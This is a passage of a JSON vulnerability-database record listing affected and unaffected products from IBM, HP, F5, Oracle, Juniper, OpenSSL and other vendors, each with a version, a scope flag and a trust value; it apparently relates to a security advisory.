        "vendor": "ibm",
        "version": "9"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.02"
      },
      {
        "model": "system storage san04b-r",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "hp-ux b.11.31 (11i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "v3)"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.3.0.870"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip ltm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "big-ip link controller hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.20"
      },
      {
        "model": "big-ip edge gateway hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip analytics hf9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "idp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "alienvault",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.12.1"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5"
      },
      {
        "model": "security network intrusion prevention system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.40"
      },
      {
        "model": "abyp-0t-2s-2l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "aura conferencing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "8.0"
      },
      {
        "model": "aspera enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.5.2"
      },
      {
        "model": "ctpos 7.0r4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "big-ip analytics hf5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0.0.840"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "business intelligence enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.1.1.7"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.14"
      },
      {
        "model": "abyp-2t-0s-2l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.32"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.211"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.15210"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.8"
      },
      {
        "model": "big-ip psm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "aspera shares",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.9.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0.64"
      },
      {
        "model": "abyp-10g-4sr-1-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "rational software architect for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "big-ip webaccelerator hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip gtm hf2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "security network controller 1.0.3352m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "alienvault",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "5.0"
      },
      {
        "model": "flex system en4023 10gb scalable switch",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.16"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.1.4"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "big-ip gtm hf9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2.8"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.14"
      },
      {
        "model": "rational software architect for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.14"
      },
      {
        "model": "project openssl 0.9.8l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.13"
      },
      {
        "model": "big-ip analytics 11.0.0-hf2",
        "scope": null,
        "trust": 0.3,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.03"
      },
      {
        "model": "version control repository manager 7.4.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.3.740"
      },
      {
        "model": "icewall sso dfw r2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.0"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1"
      },
      {
        "model": "project openssl h",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "big-ip afm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "ddos secure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "big-ip aam",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "infinity",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "pexip",
        "version": "4.0"
      },
      {
        "model": "system management homepage 7.4.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.411"
      },
      {
        "model": "infosphere master data management standard/advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.0"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.3"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.213"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "ip office server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "8.1"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.3.0"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "project openssl i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "one-x client enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.2.0"
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.17"
      },
      {
        "model": "big-ip analytics hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "system storage san42b-r",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.0i",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "predictiveinsight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1"
      },
      {
        "model": "big-ip analytics hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.3"
      },
      {
        "model": "tivoli netcool system service monitor fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.0.0"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "aspera faspex",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.9.2"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.3"
      },
      {
        "model": "big-ip ltm hf5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "big-ip edge gateway hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-ip apm hf5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.2.0"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip apm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "algo one pcre",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.9"
      },
      {
        "model": "ringmaster appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "big-iq security hf3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.5"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.28"
      },
      {
        "model": "tivoli workload scheduler for applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.7"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.13"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.21"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6.1146-108"
      },
      {
        "model": "big-ip psm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "aspera enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.5.1"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "cognos controller fp1 if1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "project openssl 1.0.0e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.0.0"
      },
      {
        "model": "icewall sso dfw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.0"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.1"
      },
      {
        "model": "project openssl a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "vgw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.4"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2.0.820"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1x8664"
      },
      {
        "model": "big-ip apm hf9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.4"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.010"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.1.0"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "project openssl c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "infinity",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "pexip",
        "version": "6.0"
      },
      {
        "model": "big-ip apm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "aspera shares",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.7.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.10"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2.2.835"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.41"
      },
      {
        "model": "infosphere guardium for applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "aura collaboration environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.1"
      },
      {
        "model": "icewall sso agent option",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8x"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "big-ip link controller hf15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "security network intrusion prevention system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.1.0"
      },
      {
        "model": "abyp-10g-4sr-1-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.33"
      },
      {
        "model": "src series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "openssh for gpfs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5"
      },
      {
        "model": "big-ip ltm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3"
      },
      {
        "model": "initiate master data service provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.1"
      },
      {
        "model": "icewall sso dfw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.3.0"
      },
      {
        "model": "endeca server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7.3.0"
      },
      {
        "model": "infinity",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "pexip",
        "version": "3.0"
      },
      {
        "model": "big-ip edge gateway 11.1.0-hf3",
        "scope": null,
        "trust": 0.3,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.3"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.9"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "project openssl 0.9.8t",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.26"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.3"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.0.2.106"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.1"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "infosphere master data management standard/advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.3"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.1.0"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "virtual connect enterprise manager sdk",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "big-ip pem hf2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "systems insight manager sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.0"
      },
      {
        "model": "big-ip asm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.1.0"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.3"
      },
      {
        "model": "abyp-0t-4s-0l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "arx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.1.1"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.03"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2.1.830"
      },
      {
        "model": "service delivery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.2"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.6"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "big-ip link controller hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-iq cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "big-ip ltm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "aspera faspex",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.7.5"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.3"
      },
      {
        "model": "big-ip link controller hf5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "endeca server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7.5.1.1"
      },
      {
        "model": "project openssl 1.0.0c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2.0.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.14.20"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.7"
      },
      {
        "model": "big-ip apm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.5.760"
      },
      {
        "model": "aspera drive",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.2.1"
      },
      {
        "model": "algo one core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0"
      },
      {
        "model": "system storage san768b",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "big-ip gtm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.0"
      },
      {
        "model": "insight orchestration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.1"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.1.3"
      },
      {
        "model": "informix genero",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.50"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "predictiveinsight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.3"
      },
      {
        "model": "alienvault",
